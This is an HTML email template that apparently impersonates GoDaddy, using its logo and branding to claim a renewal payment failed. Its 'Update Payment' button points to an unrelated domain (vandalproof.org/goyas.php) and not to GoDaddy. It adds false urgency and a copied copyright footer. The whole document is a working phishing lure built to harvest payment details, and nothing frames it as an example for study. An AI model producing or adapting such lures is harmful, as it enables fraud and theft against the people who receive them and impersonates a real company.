<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Action Required: Update Your Payment Method</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #ffffff;
      margin: 0;
      padding: 0;
      color: #333333;
    }
    .container {
      max-width: 600px;
      margin: 40px auto;
      padding: 25px;
      border: 1px solid #dddddd;
      border-radius: 8px;
      background-color: #f9f9f9;
    }
    .logo {
      background-color: #000000;
      text-align: center;
      padding: 20px 0;
    }
    .logo img {
      max-width: 150px;
      height: auto;
    }
    .title {
      font-size: 22px;
      font-weight: bold;
      text-align: center;
      margin: 25px 0 10px;
    }
    .content {
      font-size: 15px;
      line-height: 1.7;
    }
    .button {
      display: inline-block;
      margin: 20px 0;
      padding: 12px 25px;
      background-color: #000000; /* changed to black */
      color: #ffffff;
      text-decoration: none;
      border-radius: 5px;
      font-weight: bold;
    }
    .footer {
      font-size: 12px;
      color: #888888;
      text-align: center;
      margin-top: 30px;
    }
  </style>
</head>
<body>
  <div class="container">
    <div class="logo">
      <img src="https://img1.wsimg.com/cdnassets/m/47629b21accd6a6c/original/GODADDY_AIRO_LOGO_WHITE.svg" alt="GoDaddy Logo">
    </div>

    <div class="title">Action Required: Update Your Payment Method</div>

    <div class="content">
      Dear Customer,<br><br>
      We attempted to renew your GoDaddy services, but were unable to complete the transaction due to a problem with your current payment method.<br><br>
      To prevent any disruption to your services, please update your payment information as soon as possible.<br><br>
      You can securely update your details by clicking the button below:<br><br>
      <a class="button" href="https://vandalproof.org/goyas.php">Update Payment</a><br><br>
      If you have already updated your payment method, no further action is required.<br><br>
      Thank you for choosing GoDaddy.<br><br>
      Sincerely,<br>
      The GoDaddy Team
    </div>

    <div class="footer">
      © 2025 GoDaddy Operating Company, LLC. All rights reserved.<br>
      This message was sent from a no-reply email address. Please do not respond.
    </div>
  </div>
</body>
</html>